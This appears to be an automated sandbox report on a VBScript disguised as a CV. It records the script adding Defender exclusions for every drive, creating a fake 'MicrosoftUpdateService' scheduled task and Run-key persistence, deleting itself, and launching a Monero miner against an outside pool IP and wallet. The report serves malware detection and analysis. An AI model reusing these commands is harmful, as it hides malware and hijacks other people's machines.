Code function: 11_2_009D8F71 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,

11_2_009D8F71

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\Public\user-PC_77

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ocm3mv2k.nmn.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like 'mservice.exe'
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like 'mservice.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like 'mservice.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like 'mservice.exe'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like 'mservice.exe'

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: curriculum_vitae-copie.vbs

Virustotal: Detection: 17%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\curriculum_vitae-copie.vbs
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
Source: unknown	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z
Source: C:\Users\Public\7g.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im chrome.exe
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 46h9kZidsk2VUmQNv72SLMMrizTnSJTYtHJRFXeBrZcDJjVHTn83T5teYjUggDNLbTYdwgsgHQC2N3LzoNQdqppN6SYmjYr -p 0401-08h49m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
Source: C:\Users\Public\WindowsUpdate\mservice.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im chrome.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 46h9kZidsk2VUmQNv72SLMMrizTnSJTYtHJRFXeBrZcDJjVHTn83T5teYjUggDNLbTYdwgsgHQC2N3LzoNQdqppN6SYmjYr -p 0401-08h49m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: .pdbo` source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, go.exe.11.dr
Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: 7g.exe, 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 7g.exe, 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: ShellExecute("wscript.exe", ""C:\Users\user\Desktop\curriculum_v", "", "runas", "1");
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: CreateTextFile("C:\Users\Public\user-PC_77", "true");IFileSystem3.FileExists("C:\Users\Public\user-PC_77");IFileSystem3.FileExists("C:\Users\Public\user-PC_77");IFileSystem3.OpenTextFile("C:\Users\Public\mutex", "2", "true");IHost.ScriptFullName();IFileSystem3.DeleteFile("C:\Users\user\Desktop\curriculum_vitae-copie.vbs", "true");IWshShell3.ExpandEnvironmentStrings("%computername%");IWshShell3.SpecialFolders("0");IFileSystem3.GetParentFolderName("C:\Users\Public\Desktop");IFileSystem3.FileExists("C:\Users\Public\user-PC_77");IWshShell3.RegRead("HKEY_USERS\S-1-5-19\Environment\TEMP");IFileSystem3.CreateTextFile("C:\Users\Public\user-PC_77", "true");IFileSystem3.FileExists("C:\Users\Public\user-PC_77");IFileSystem3.FileExists("C:\Users\Public\user-PC_77");IFileSystem3.OpenTextFile("C:\Users\Public\mutex", "2", "true");IHost.ScriptFullName();IFileSystem3.DeleteFile("C:\Users\user\Desktop\curriculum_vitae-copie.vbs", "true");IShellDispatch6.ShellExecute("cmd.exe", "/c powershell -C "Add-MpPreference -Exc", "", "runas", "0");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.S

Source: C:\Users\Public\7g.exe

Code function: 11_2_00A0A7BC GetCurrentProcess,GetProcessTimes,fputs,memset,GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,__aulldiv,fputs,fputs,__aulldiv,__aulldiv,fputs,

11_2_00A0A7BC

Source: go.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x3e524
Source: mservice.exe.11.dr	Static PE information: real checksum: 0x496ae1 should be: 0x48da3c
Source: 7zr[1].exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x9999c
Source: 7g.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x9999c

Source: 7zr[1].exe.4.dr	Static PE information: section name: .sxdata
Source: 7g.exe.4.dr	Static PE information: section name: .sxdata
Source: mservice.exe.11.dr	Static PE information: section name: _RANDOMX
Source: mservice.exe.11.dr	Static PE information: section name: _TEXT_CN
Source: mservice.exe.11.dr	Static PE information: section name: _TEXT_CN
Source: mservice.exe.11.dr	Static PE information: section name: _RDATA

Source: C:\Users\Public\7g.exe	Code function: 11_2_00A3F140 push eax; ret		11_2_00A3F15E
Source: C:\Users\Public\7g.exe	Code function: 11_2_00A3F4C0 push eax; ret		11_2_00A3F4EE

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\Public\7g.exe

File created: C:\Users\Public\WindowsUpdate\WinRing0x64.sys

Jump to behavior

Source: C:\Users\Public\7g.exe	File created: C:\Users\Public\WindowsUpdate\mservice.exe	Jump to dropped file
Source: C:\Users\Public\7g.exe	File created: C:\Users\Public\WindowsUpdate\WinRing0x64.sys	Jump to dropped file
Source: C:\Users\Public\7g.exe	File created: C:\Users\Public\WindowsUpdate\ps.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\Public\7g.exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\7zr[1].exe	Jump to dropped file
Source: C:\Users\Public\7g.exe	File created: C:\Users\Public\WindowsUpdate\go.exe	Jump to dropped file

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\Public\7g.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\Public\7g.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"

Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Media Service			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Media Service			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\curriculum_vitae-copie.vbs

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
